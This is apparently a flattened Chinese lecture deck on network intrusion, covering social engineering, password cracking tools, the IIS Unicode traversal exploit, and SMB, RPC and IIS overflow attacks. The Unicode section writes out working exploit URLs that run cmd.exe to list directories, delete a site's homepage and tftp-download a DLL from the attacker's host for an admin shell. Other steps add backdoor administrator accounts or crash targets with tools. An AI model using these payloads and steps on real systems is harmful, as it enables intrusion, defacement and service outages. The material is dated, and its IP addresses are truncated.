第7講網(wǎng)絡入侵

第7講網(wǎng)絡入侵內容提要社會工程學攻擊物理攻擊暴力攻擊利用Unicode漏洞攻擊利用緩沖區(qū)溢出漏洞進行攻擊等技術。并結合實際，介紹流行的攻擊工具的使用以及部分工具的代碼實現(xiàn)。社會工程學攻擊社會工程學是使用計謀和假情報去獲得密碼和其他敏感信息的科學?；蛘哒f是一種通過對受害者心理弱點、本能反應、好奇心、信任、貪婪等心理陷阱進行諸如欺騙、傷害等危害手段，取得自身利益的手法，近年來已成迅速上升甚至濫用的趨勢。研究一個站點的策略其中之一就是盡可能多的了解這個組織的個體，因此黑客不斷試圖尋找更加精妙的方法從，他們希望滲透的組織那里獲得信息社會工程學攻擊舉個例子：一組高中學生曾經(jīng)想要入侵某公司的網(wǎng)絡，他們擬定了一個表格，調查看上去顯得是無害的個人信息，例如所有秘書和行政人員和他們的配偶、孩子的名字。這些從學生轉變成的黑客說這種簡單的調查是他們社會研究工作的一部分。利用這份表格這些學生能夠快速的進入系統(tǒng)，因為網(wǎng)絡上的大多數(shù)人是使用寵物和他們配偶名字作為密碼。社會工程學攻擊1、打電話請求密碼

盡管不像前面討論的策略那樣聰明，打電話尋問密碼也經(jīng)常奏效。在社會工程中那些黑客冒充失去密碼的合法雇員，經(jīng)常通過這種簡單的方法重新獲得密碼。2、偽造Email一個黑客使用telnet可以截取任何一個身份證發(fā)送Email的全部信息，這樣的Email消息是真的，因為它發(fā)自于一個合法的用戶。在這種情形下這些信息顯得是絕對的真實。黑客可以偽造這些。一個冒充系統(tǒng)管理員或經(jīng)理的黑客就能較為輕松的獲得大量的信息，黑客就能實施他們的惡意陰謀。社會工程學攻擊舉例1、請狼入室李小姐是某個大公司的經(jīng)理秘書，她工作的電腦上存儲著公司的許多重要業(yè)務資料，所以屬于公司著重保護的對象，安全部門設置了層層安全防護措施，可以說，她的電腦要從外部攻破是根本不可能的事情。為了方便修改設置和查殺病毒，安全部門可以直接通過網(wǎng)絡服務終端對李小姐的電腦進行全面設置。也許貪圖方便，維護員與李小姐的日常聯(lián)系是通過QQ進行的。這天，李小姐剛打開QQ，就收到維護員的消息：“小李，我忘記登錄密碼了，快告訴我，有個緊急的安全設置要做呢！”因為和維護員很熟了，李小姐就把密碼發(fā)了過去。。。。一夜之間，公司的主要競爭對手掌握了公司的業(yè)務！社會工程學攻擊舉例由于安全部門距離李小姐的工作地點有好些距離，管理不方便，所以公司讓他們直接通過網(wǎng)絡來管理機器！他與李小姐之間的聯(lián)系通過QQ進行。問題偏偏就出在QQ上。作為安全人員，他自然知道密碼的重要性，因此他的任何密碼都設置得十分復雜，窮舉幾乎不可能。至于被入侵，那更不可能發(fā)生。然而百密仍有一疏，他做夢也沒想到對手利用QQ的取回密碼功能輕易拿到了他的密碼。剖析：

李小姐正是出于對維護員的信任才被對方欺騙的。因為那個在QQ上出現(xiàn)的維護員根本不是公司的維護員本人，而是對手盜取了維護員的QQ，再利用一個小小的信任關系，就輕易取得了登錄密碼。2、形同虛設的密碼社會工程學攻擊舉例剖析：他在輸入提示答案的時候，下意識地輸入了心里最重要的那個人的名字。但是對手也知道他心里那個人的名字，所謂的“知己知彼”小馬絢麗的QQ秀和一些特色服務，但舍不得花錢。好想有免費的Q幣。某天一QQ好友給他發(fā)來一個URL，還說這個網(wǎng)站通過一定的點擊次數(shù)提供Q幣。如此好的機會小馬怎能放過？他根據(jù)網(wǎng)站的提示輸入了QQ號碼和密碼完成注冊，然后給QQ上的朋友們發(fā)了網(wǎng)址。然而等了許久，自己的Q幣依然沒有動靜。第二天，小馬想登錄QQ時，卻發(fā)現(xiàn)怎么也登錄不上去了——QQ密碼被人改了。這是最近鬧得轟轟烈烈的QQ欺騙案件之一。3、E時代的守株待兔社會工程學攻擊舉例大哥你是不是太搞笑？！改我密碼還要5分鐘啊？麻煩你快一點好不好！還有QQ中獎要求用戶填寫密碼以待“驗證”等伎倆，無論什么手法，最終結局都是一樣的，那就是——用戶的密碼被人改掉。如此白癡的騙局，只要有點常識的人都不難理解其中的“笑話”，奇怪的是卻屢屢有人上當，究其原因，就是因為國人的貪小便宜心理作祟。剖析：這就是著名的“網(wǎng)絡釣魚”！論壇常有帖子：“……騰訊公司預留了專用號碼作為充值號，此號是自動讀取指令的，為了不引起大家的注意，所以這個QQ比較普通，這個QQ一般隱身。只要發(fā)送{Jerusalum/PLO號碼}{Vesselin

Bontchev密碼}{FRALDMUZKQ幣數(shù)量}，然后下線5分鐘，等著收Q幣吧?！鄙鐣こ虒W攻擊舉例王先生是一家銀行的職員，通常都是直接在網(wǎng)絡上完成轉賬操作的。由于他的電腦水平不高，前不久被一個初學者駭客入侵了機器。在請來專業(yè)人員修復系統(tǒng)更改密碼后，王先生照例登錄網(wǎng)絡銀行為手機繳費，可是才過一會兒他的冷汗就出來了：網(wǎng)絡銀行登錄不進去了！深感大事不妙的王先生去銀行辦理了相關手續(xù)，查賬發(fā)現(xiàn)賬戶里的錢已經(jīng)被人劃走了。因為王先生犯了大部分人都會犯的致命錯誤：通常為了記憶方便，人們會把幾處的密碼都設置成一樣的，例如QQ、E-MAIL、FTP、網(wǎng)站等的密碼，而王先生更進一步把所有密碼都弄成一樣的了，因此入侵者在得到王先生的機器登錄密碼后也就得到了網(wǎng)絡銀行的密碼。正是因為這個普遍心理特點，受害者往往都是被入侵者一鍋端了！因為簡單密碼和相同密碼是大部分人都會碰到的心理弱點4、輕而易舉的入侵物理攻擊與防范物理安全是保護一些比較重要的設備不被接觸。物理安全比較難防，因為攻擊往往來自能夠接觸到物理設備的用戶。例5-1得到管理員密碼用戶登錄以后，所有的用戶信息都存儲在系統(tǒng)的進程，winlogon.exe中?？捎肍indPass等工具對該進程進行解碼。將它放到C:\后執(zhí)行該程序，將得到當前用戶得登錄名！權限提升有時候，管理員為了安全，給其他用戶建立一個普通用戶帳號，認為這樣就安全了。其實不然，用普通用戶帳號登錄后，可以利用工具GetAdmin.exe將自己加到管理員組或者新建一個具有管理員權限的用戶。普通用戶建立管理員帳號輸入一個用戶名如：IAMHacker，點擊"確定"后，然后點擊主窗口"OK"，出現(xiàn)添加成功的窗口。暴力攻擊暴力攻擊的一個具體例子是，一個黑客試圖使用計算機和信息去破解一個密碼。一個黑客需要破解—段單一的被用非對稱密鑰加密的信息，為了破解這種算法，一個黑客需要求助于非常精密復雜的方法，它使用120個工作站，兩個超級計算機利用從三個主要的研究中心獲得的信息，即使擁有這種配備，它也將花掉八天的時間去破解加密算法，實際上破解加密過程八天已是非常短暫的時間了。字典文件一次字典攻擊能否成功，很大因素上決定與字典文件。一個好的字典文件可以高效快速的得到系統(tǒng)的密碼。攻擊不同的公司、不通地域的計算機，可以根據(jù)公司管理員的姓氏以及家人的生日，可以作為字典文件的一部分，公司以及部門的簡稱一般也可以作為字典文件的一部分，這樣可以大大的提高破解效率。一個字典文件本身就是一個標準的文本文件，其中的每一行就代表一個可能的密碼。目前有很多工具軟件專門來創(chuàng)建字典文件。暴力破解操作系統(tǒng)密碼字典文件為暴力破解提供了一條捷徑，程序首先通過掃描得到系統(tǒng)的用戶，然后利用字典中每一個密碼來登錄系統(tǒng)，看是否成功，如果成功則將密碼顯示.比如使用字典文件，利用GetNTUser依然可以將管理員密碼破解出來.暴力破解郵箱密碼郵箱的密碼一般需要設置到八位以上，否則七位以下的密碼容易被破解。尤其七位全部是數(shù)字，更容易被破解。黑雨——POP3郵箱密碼暴力破解器.暴力破解軟件密碼目前許多軟件都具有加密的功能，比如Office文檔、Winzip文檔和WinRaR文檔等等。這些文檔密碼可以有效的防止文檔被他人使用和閱讀。但是如果密碼位數(shù)不夠長的話，同樣容易被破解。破解Word文檔密碼AdvancedOfficeXPPasswordRecovery可以快速破解Word文檔密碼。破解Word文檔密碼設置密碼長度最短是一位，最長是三位，點擊工具欄開始的圖標，開始破解密碼，大約兩秒鐘后，密碼被破解了。Unicode漏洞專題通過打操作系統(tǒng)的補丁程序，就可以消除漏洞。只要是針對漏洞進行攻擊的案例都依賴于操作系統(tǒng)是否打了相關的補丁。Unicode漏洞是2000-10-17發(fā)現(xiàn)的，受影響的版本：MicrosoftIIS5.0+MicrosoftWin2K系列版本MicrosoftIIS4.0+WindowsNT4.0消除該漏洞的方式是安裝操作系統(tǒng)的補丁，只要安裝了SP1以后，該漏洞就不存在了。微軟IIS4.0和5.0都存在利用擴展UNICODE字符取代"/"和"\"而能利用"../"目錄遍歷的漏洞。Unicode漏洞的檢測方法使用掃描工具X-Scan來檢測Unicode漏洞是否存在。目標主機IP為：09，Unicode漏洞屬于IIS漏洞，所以這里只掃描IIS漏洞就可以了，X-Scan設置。Unicode漏洞的檢測方法將主機添加到目標地址，掃描結果如圖。Unicode漏洞的檢測方法只要是/scripts開頭的漏洞都是Unicode漏洞。比如：/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir其中/scripts目錄是IIS提供的可以執(zhí)行命令的一個有執(zhí)行程序權限的一個目錄Unicode漏洞的檢測方法scripts目錄一般系統(tǒng)盤根目錄下的Inetpub目錄下Unicode漏洞的檢測方法在Windows的目錄中，可以使用“../”來訪問上一級目錄在瀏覽器中利用“scripts/../../”可以訪問到系統(tǒng)盤根目錄，訪問“scripts/../../winnt/system32”就訪問到系統(tǒng)的system32了，在system32目錄下包含許多重要的系統(tǒng)文件，比如cmd、net命令，可以利用該文件新建用戶，刪除文件等操作。瀏覽器地址欄中禁用符號“../”，但是可以使用符號“/”的Unicode的編碼。比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode編碼。這條語句是執(zhí)行dir命令列出目錄結構。Unicode漏洞此漏洞從中文IIS4.0+SP6開始，還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，臺灣繁體中文也同樣存在這樣的漏洞。在NT4中/編碼為“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。但從國外某些站點得來的資料顯示，還有以下的編碼可以實現(xiàn)對該漏洞的檢測，該編碼存在于日文版、韓文版等操作系統(tǒng)。%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af利用漏洞讀取系統(tǒng)盤目錄利用該漏洞讀取出計算機上目錄列表，比讀取C盤的目錄：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+c:\利用漏洞讀取系統(tǒng)盤目錄利用語句得到對方計算機上裝了幾個操作系統(tǒng)以及操作系統(tǒng)的類型，只要讀取C盤下的boot.ini文件就可以了。09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type+c:\boot.ini利用漏洞刪除主頁利用Unicode可以方便的更改對方的主頁，若對方網(wǎng)站的根路徑在“C:\Initpub\wwwroot”（系統(tǒng)默認）下，可以刪除該路徑下的文件“default.asp”來刪除主頁，這里的“default.asp”文件是IIS的默認啟動頁面。使用的語句是：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del+c:\inetpub\wwwroot\default.asp利用漏洞刪除主頁拷貝文件將cmd.exe文件拷貝到scripts目錄，并改名為c.exe：09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+c.exe查看C盤的目錄以后使用cmd.exe命令就方便了，比如查看C盤的目錄，使用的語句就可以簡化為：09/scripts/c.exe?/c+dir+c:\利用漏洞入侵系統(tǒng)在地址欄上執(zhí)行命令，用戶的權限比較低，像net等系統(tǒng)管理指令不能執(zhí)行。利用Unicode可以入侵對方的系統(tǒng)，并得到管理員權限。首先需要向對方服務器上傳一些文件，入侵的第一步，建立tftp服務器，向對方的scripts文件夾傳幾個文件。需要上傳一個名為“idq.dll”的文件，為了上傳這個文件，首先在本地計算機上搭建一個TFTP服務器，它一般用來傳輸單個文件。使用工具軟件tftpd32.exe建立服務器。將idq.dll和tftpd32.exe放在本地的同一目錄下，執(zhí)行tftpd32.exe程序。利用漏洞入侵系統(tǒng)利用漏洞入侵系統(tǒng)在本地的TFTP的服務器就建立好了，保留這個窗口，通過該服務器向對方傳遞idq.dll文件。在瀏覽器中執(zhí)行命令：“09/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”，命令其實是“tftp–i10getidq.dll”意思是從10服務器上獲取idq.dll文件上載文件并查看成果入侵對方主機拷貝ispc.exe到本地計算機的C:\，在命令行下執(zhí)行：“ispc.exe09/scripts/idq.dll”，連接成功后就直接進入了對方的DOS命令行下，而且具有管理員權限。建立用戶可以在對方計算機上做管理員可以做的一切事情，比如添加用戶。建立用戶名：Hacker123，密碼：Hacker123利用打印漏洞攻擊利用打印漏洞可以在目標的計算機上添加一個具有管理員權限的用戶（用戶名與密碼均為：hax）。經(jīng)過測試，該漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保證100%入侵成功。工具：cniis.exe，格式是：cniis090參數(shù)1：是目標的IP地址，參數(shù)2：目標系統(tǒng)的補丁號因為09沒有打補丁，這里就是0。SMB致命攻擊SMB（SessionMessageBlock，會話消息塊協(xié)議）又叫做NetBIOS或LanManager協(xié)議，用于不同計算機之間文件、打印機、串口和通訊的共享和用于Windows平臺上提供磁盤和打印機的共享。SMB協(xié)議版本有很多種，在Windows98、WindowsNT、Windows2000和XP使用的是NTLM0.12版本。利用該協(xié)議可以進行各方面的攻擊，比如可以抓取其他用戶訪問自己計算機共享目錄的SMB會話包，然后利用SMB會話包登錄對方的計算機。下面介紹利用SMB協(xié)議讓對方操作系統(tǒng)系統(tǒng)重新啟動或者藍屏。致命攻擊使用的工具軟件是：SMBDieV1.0，該軟件對打了SP3、SP4的計算機依然有效，必須打專門的SMB補丁.攻擊需要兩個參數(shù)：對方的IP地址和對方的機器名致命攻擊然后再點按鈕“Kill”，如果參數(shù)輸入沒有錯誤的話，對方計算機立刻重啟或藍屏，命中率幾乎100%緩沖區(qū)溢出攻擊目前最流行的一種攻擊技術就是緩沖區(qū)溢出攻擊。當目標操作系統(tǒng)收到了超過了它的最大能接收的信息量的時候，將發(fā)生緩沖區(qū)溢出。這些多余的數(shù)據(jù)將使程序的緩沖區(qū)溢出，然后覆蓋了實際的程序數(shù)據(jù)，緩沖區(qū)溢出使目標系統(tǒng)的程序被修改，經(jīng)過這種修改的結果使在系統(tǒng)上產(chǎn)生一個后門。這項攻擊對技術要求比較高，但是攻擊的過程卻非常簡單。緩沖區(qū)溢出原理很簡單，比如程序：緩沖區(qū)溢出攻擊voidfunction(char*szPara1){ charbuff[16];

strcpy(buffer,szPara1);}程序中利用strcpy函數(shù)將szPara1中的內容拷貝到buff中，只要szPara1的長度大于16，就會造成緩沖區(qū)溢出。存在strcpy函數(shù)這樣問題的C語言函數(shù)還有：strcat()、gets()、scanf()等。RPC漏洞溢出遠程過程調用RPC（RemoteProcedureCall)，是操作系統(tǒng)的一種消息傳遞功能，允許應用程序呼叫網(wǎng)絡上的計算機。當系統(tǒng)啟動的時候，自動加載RPC服務?？梢栽诜樟斜碇锌吹较到y(tǒng)的RPC服務，如圖。用RPC漏洞建立超級用戶RPC溢出漏洞，對SP4也適用，必須打專用補丁。利用工具scanms.exe文件檢測RPC漏洞，該工具是ISS安全公司2003年7月30日發(fā)布的，運行在命令行下用來檢測指定IP地址范圍內機器是否已經(jīng)安裝了“DCOMRPC接口遠程緩沖區(qū)溢出漏洞（823980-MS03-026）”補丁程序。如果沒有安裝補丁程序，該IP地址就會顯示出“[VULN]”。首先拷貝該文件到C盤根目錄，現(xiàn)在要檢查地址段09到10的主機，執(zhí)行命令“scanms.exe09-10”檢查緩沖區(qū)溢出漏洞利用工具軟件attack.exe對09進行攻擊。攻擊的結果將在對方計算機上建立一個具有管理員權限的用戶，并終止了對方的RPC服務。新建用戶的用戶名和密碼都是qing10，這樣就可以登錄對方計算機了，RPC服務停止操作系統(tǒng)將有許多功能不能使用，非常容易被管理員發(fā)現(xiàn)，可用OpenRpcSs來給對方重啟RPC服務。攻擊的全過程利用IIS溢出進行攻擊1、利用軟件SnakeIIS溢出工具可以讓對方的IIS溢出，還可以捆綁執(zhí)行的命令和在對方計算機上開辟端口。2、它適用于各類操作系統(tǒng)，如對09進行攻擊，其系統(tǒng)為Win2K，沒有安裝補丁程序，攻擊完畢后，開辟一個813端口，并在對方計算機上執(zhí)行命令“dirc:\。3、點擊按鈕“IDQ溢出”，出現(xiàn)攻擊成功的提示框利用IIS溢出進行攻擊利用IIS溢出進行攻擊現(xiàn)813端口已經(jīng)開放，可用nc.exe連接到該端口，將會自動執(zhí)行剛才發(fā)送的命令“dirc:\